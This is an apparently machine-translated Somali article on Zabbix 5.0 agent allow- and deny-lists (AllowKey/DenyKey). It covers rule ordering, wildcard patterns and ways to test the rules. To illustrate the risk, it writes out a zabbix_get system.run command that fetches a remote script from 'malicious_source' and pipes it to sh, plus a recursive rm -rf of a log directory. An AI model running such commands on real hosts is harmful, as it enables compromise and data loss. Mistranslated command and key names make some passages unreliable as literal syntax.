Liiska madow iyo taageerada liiska-cadeynta ee metrik-dhinaca wakiilka ee Zabbix 5.0

Liiska madow iyo taageerada liiska-cadeynta ee cabbirada wakiilada-dhinaca

Tikhon Uskov, Injineer Isdhexgalka, Zabbix

Arrimaha amniga xogta

Zabbix 5.0 waxay leedahay muuqaal cusub oo kuu oggolaanaya inaad hagaajiso amniga nidaamyada adoo isticmaalaya Zabbix Agent oo bedelaya halbeeggii hore U sahla amarrada fog-fog.

Hagaajinta amniga nidaamyada ku saleysan wakiilka waxay ka yimaadaan xaqiiqda ah in wakiilku uu sameyn karo tiro badan oo ah falal khatar ah oo suurtagal ah.

• Wakiilku waxa uu ururin karaa ku dhawaad ​​macluumaad kasta, oo ay ku jiraan macluumaadka sirta ah ama suurtogalka ah ee khatarta ah, laga soo bilaabo faylalka habaynta, faylasha log, faylasha sirta ah, ama faylal kasta oo kale.

Tusaale ahaan, adoo isticmaalaya utility zabbix_get waxaad geli kartaa liiska isticmaalayaasha, hagayaasha gurigooda, faylasha sirta ah, iwm.

Helitaanka xogta iyadoo la isticmaalayo zabbix_get utility

XUSUUS. Xogta waxaa la soo celin karaa oo keliya haddii wakiilku uu akhriyay oggolaanshaha faylka u dhigma. Laakiin, tusaale ahaan, faylka / iwm/passwd/ akhrin karo dhammaan isticmaalayaasha.

• Wakiilku waxa kale oo uu fulin karaa amarrada khatarta ah. Tusaale ahaan, furaha *nidaamka.run[]** wuxuu kuu ogolaanayaa inaad fuliso amar kasta oo fog oo ku saabsan noodhka shabakada, oo ay ku jiraan qoraallada socodsiinta ee shabakada internetka ee Zabbix oo sidoo kale fuliya amarrada dhinaca wakiilka.

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

• On Linux, wakiilku wuxuu u shaqeeyaa si caadi ah iyada oo aan lahayn mudnaanta xididka, halka Windows-ka uu u shaqeeyo adeeg ahaan System oo uu si xaddidan u galo nidaamka faylka. Sidaa darteed, haddii aan wax isbeddel ah lagu samayn xuduudaha Wakiilka Zabbix ka dib marka la rakibo, wakiilku wuxuu heli karaa diiwaanka, nidaamka faylka wuxuuna fulin karaa weydiimaha WMI.

Noocyadii hore ee cabbirka EnableRemoteCommands=0 loo ogolyahay kaliya in la joojiyo mitirka furaha *nidaamka.run[]** iyo socodsiinta qoraallada ka socda interface-ka shabakadda, laakiin ma jirin hab lagu xaddido gelitaanka faylalka gaarka ah, loo oggolaado ama la joojiyo furayaasha gaarka ah ee lagu rakibay wakiilka, ama xaddido isticmaalka cabbirrada shakhsi ahaaneed.

Isticmaalka halbeegga EnableRemoteCommand ee noocyadii hore ee Zabbix

AllowKey/DiidKey

Zabbix 5.0 waxay ka caawisaa ka ilaalinta galitaanka aan la ogalayn ee noocan oo kale ah iyada oo siinaya liisaska cadcad iyo liiska madow si loo oggolaado oo loo diido cabbirada dhinaca wakiilka.

Gudaha Zabbix 5.0 dhammaan furayaasha, oo ay ku jiraan *nidaamka.run[]** waa la dajiyay, waxaana lagu daray laba ikhtiyaar oo qaabeynta wakiilka cusub:

AllowKey= - jeegag la oggol yahay;

DenyKey= - jeegaga mamnuuca ah;

aaway qaab magac oo muhiim ah oo leh halbeegyo adeegsada jilayaasha meta (*).

Furayaasha AllowKey iyo DenyKey waxay kuu oggolaanayaan inaad oggolaato ama diiddo cabbirrada shaqsiyeed ee ku saleysan qaab gaar ah. Si ka duwan halbeegyada qaabeynta kale, tirada cabbirrada AllowKey/DenyKey ma xaddidna. Tani waxay kuu ogolaaneysaa inaad si cad u qeexdo waxa dhabta ah ee wakiilku ku samayn karo nidaamka adoo abuuraya geedka jeegagga - furayaasha la fulin karo, halkaas oo habka ay u qoran yihiin door muhiim ah.

Xeerarka isku xigxiga

Xeerarka waxaa lagu hubiyaa sida ay u kala horreeyaan oo loo geliyo faylka qaabeynta. Furaha waxaa lagu hubiyaa sharciga ka hor kulanka ugu horreeya, iyo isla marka furaha cunsurka xogtu uu la mid yahay qaabka, waa la oggol yahay ama la diidaa. Taas ka dib, sharciga hubinta ayaa joogsanaya furayaasha soo hadhayna waa la iska indhatiray.

Sidaa darteed, haddii curiye u dhigma sharciga oggolaanshaha iyo diidmada labadaba, natiijadu waxay ku xirnaan doontaa xeerka ugu horreeya faylka qaabeynta.

2 xeer oo kala duwan oo leh qaab isku mid ah iyo fure vfs.file.size[/tmp/file]

Habka isticmaalka furayaasha AllowKey/DenyKey:

1. xeerarka saxda ah,
2. xeerarka guud,
3. xeer mamnuuc ah.

Tusaale ahaan, haddii aad u baahan tahay gelitaanka faylalka gal gaar ah, waa inaad marka hore oggolaataa gelitaankooda, ka dibna aad diiddaa wax kasta oo kale oo aan ku dhicin rukhsadaha la aasaasay. Haddii xeerka diidmada marka hore la isticmaalo, gelitaanka galka waa la diidi doonaa.

isku xigxiga saxda ah

Haddii aad u baahan tahay inaad u ogolaato 2 yutiilitida inay ku shaqeeyaan *nidaamka.run[]**, iyo xeerka diidmada ayaa marka hore la cayimi doonaa, yutiilitida lama bilaabi doono, sababtoo ah qaabka ugu horreeya wuxuu had iyo jeer la mid yahay furaha kasta, xeerarka soo socdana waa la iska indhatiraa.

Isku xigxiga khaldan

Naqshadaha

Xeerarka aasaasiga ah

Qaabka waa tibaax leh calaamado duurjoog ah. Dabeecadda badan (*) waxay u dhigantaa tiro kasta oo xaraf kasta oo meel gaar ah jooga. Metacharacters waxaa loo isticmaali karaa labadaba magaca muhiimka ah iyo xuduudaha. Tusaale ahaan, waxaad si adag u qeexi kartaa halbeegga koowaad ee qoraalka, oo u sheeg midda soo socota sida duurjoogta.

Halbeegyada waa in lagu xidhaa geesaha labajibbaaran [].

• system.run[* - khalad
• vfs.file*.txt] - khalad
• vfs.file.*[*] - xaq

Tusaalooyinka isticmaalka khariidadaha.

1. Magaca muhiimka ah iyo halbeegga dhexdiisa. Xaaladdan oo kale, furuhu uma dhigmo fure la mid ah oo aan ku jirin halbeeg, maaddaama qaabka aan ku muujinnay inaan rabno inaan helno dhammaadka magaca muhiimka ah iyo qaybo gaar ah.
2. Haddii qaabku aanu isticmaalin xajin labajibbaaran, qaabku wuxuu u ogolaanayaa dhammaan furayaasha aan ku jirin xad-dhaafka wuxuuna diidaa dhammaan furayaasha ay ku jiraan cabbirka la cayimay.
3. Haddii furuhu uu si buuxda u qoran yahay oo cabbirrada loo cayimay sida duurjoogta ah, waxa ay la mid noqon doontaa furaha kasta oo la mid ah cabbir kasta mana la mid noqon doono furaha iyada oo aan lahayn biraha labajibbaaran, ie. waa la oggolaan doonaa ama waa la diidi doonaa.

Xeerarka buuxinta xuduudaha.

• Haddii fure leh cabbirro la doonayo in la isticmaalo, cabbirrada waa in lagu qeexaa faylka qaabeynta. Halbeegyada waa in lagu qeexaa sida xaraf-dheer. Waa lagama maarmaan in si taxadar leh loo diido gelitaanka fayl kasta lana tixgeliyo macluumaadka mitirku ku bixin karo higaada kala duwan - oo leh iyo iyada oo aan lahayn xuduudo.

Astaamaha furayaasha qorista oo leh cabbirro

• Haddii furaha lagu qeexo halbeegyo, laakiin cabbiradu ay yihiin ikhtiyaari oo loo cayimay sidii meta characterer, furaha aan xadka lahayn waa la xallin doonaa. Tusaale ahaan, haddii aad rabto in aad joojiso helitaanka macluumaadka ku saabsan culeyska CPU oo aad qeexdo in system.cpu.load[*] furaha uu naafo yahay, ha iloobin in furaha aan xuduuduhu soo celin doonin celceliska qiimaha culeyska.

Xeerarka buuxinta xuduudaha

Xusuusin

sixitaanka

• Xeerarka qaar ma beddeli karo isticmaaluhu, tusaale ahaan, xeerarka sahaminta ama xeerarka isdiiwaangelinta wakiilka. Xeerarka AllowKey/DenyKey ma saameeyaan xuduudaha soo socda:
  - Shayga martida loo yahay
  - HostMetadataItem
  - HostInterfaceItem

XUSUUS. Haddii maamuluhu joojiyo furaha, marka la waydiiyo, Zabbix ma bixiso macluumaadka ku saabsan sababta mitirka ama furuhu ugu dhaco qaybta 'LAMA TAAGEERO'. Macluumaadka ku saabsan mamnuucista fulinta amarada fog-fog sidoo kale laguma soo bandhigo faylasha log wakiilka. Tani waa sababo ammaan dartood, laakiin waxa ay adkayn kartaa khaladka samaynta haddii cabbiradu ku dhacaan qayb aan la taageerin sabab qaar.

• Waa inaadan isku hallayn amar kasta oo gaar ah oo loogu talagalay isku xirka faylalka qaabeynta dibadda (tusaale ahaan, siday u kala horreeyaan alifbeetada).

Khadka Taleefanka Utilities

Ka dib dejinta xeerarka, waxaad u baahan tahay inaad hubiso in wax walba si sax ah loo habeeyey.

Waxaad isticmaali kartaa mid ka mid ah saddexda doorasho:

• Ku dar halbeeg Zabbix
• Ku tijaabi zabbix_agent. Wakiilka Zabbix oo leh ikhtiyaar -daabac (-p) waxay muujinaysaa dhammaan furayaasha (kuwaas oo loo ogol yahay default) marka laga reebo kuwa aan la ogolayn qaabeynta. Iyo ikhtiyaarka -tijaabi (-t) waayo furaha mamnuuca ah ayaa soo laaban doona'Furaha sheyga aan la taageerin'.
• Ku tijaabi zabbix_hel. Utility zabbix_hel oo leh ikhtiyaar -k soo laaban doona'ZBX_NOTSUPPORTED: Qiyaas aan la garanayn'.

Allow ama diid

Waxaad diidi kartaa gelitaanka faylka oo aad xaqiijisaa, tusaale ahaan, adigoo isticmaalaya utility zabbix_helin gelitaanka faylka la diiday.

**

XUSUUS. Xigashooyinka ku jira cabbirka waa la iska indhatiray.

Xaaladdan oo kale, gelitaanka faylkaas waxaa laga yaabaa in loo oggolaado iyada oo loo marayo waddo kale. Tusaale ahaan, haddii ay calaamad u horseeddo.

Waxaa lagu talinayaa in la hubiyo fursadaha kala duwan ee lagu dabaqi karo xeerarka la cayimay, iyo sidoo kale in la tixgeliyo suurtogalnimada in la hareer maro mamnuucida.

Su'aalo iyo Jawaabo

Su'aashaada. Waa maxay sababta qaabkan qalafsan ee luuqadeeda loo doortay si ay u qeexdo xeerarka, ogolaanshaha iyo mamnuucida? Waa maxay sababta ay suurtogal u ahayn in la isticmaalo, tusaale ahaan, tibaaxaha caadiga ah ee Zabbix isticmaalo?

Jawaab. Tani waa arrin ku saabsan waxqabadka regex maadaama uu inta badan jiro hal wakiil oo ay hubiso tiro aad u badan oo cabbirro ah. Regex waa hawl aad u culus mana ku hubin karno kumanyaal metrik habkan. Wildcards - caalami ah, si ballaaran loo isticmaalo iyo xal fudud.

Su'aashaada. Miyaanay ku jirin faylalka sida alifbeetada u kala horreeyaan?

Jawaab. Ilaa hadda inta aan ogahay, waa wax aan macquul aheyn in la saadaaliyo sida ay u kala horreeyaan xeerarka loo dabaqi doono haddii aad ku faafiso sharciyada faylasha kala duwan. Waxaan ku talinayaa in la ururiyo dhammaan xeerarka AllowKey/DiidiiKey hal Ku dar faylka, sababtoo ah way is dhexgalaan, oo ay ku jiraan faylkan.

Su'aashaada. Gudaha Zabbix 5.0 ikhtiyaarka 'EnableRemoteCommands=' ayaa ka maqan faylka qaabeynta, oo kaliya AllowKey/DenyKey ayaa diyaar ah?

Jawaab. Haa waa sax.

Qalbadda

Source: www.habr.com